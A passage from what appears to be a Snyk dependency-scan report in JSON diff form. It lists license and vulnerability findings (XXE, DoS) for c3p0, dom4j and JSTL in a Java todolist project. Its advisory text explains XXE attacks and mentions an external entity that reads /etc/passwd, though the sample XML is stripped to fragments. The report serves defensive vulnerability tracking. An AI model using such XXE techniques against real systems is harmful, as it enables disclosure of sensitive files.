- "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2" - } - ], - "ok": false, - "dependencyCount": 42, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "99 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using 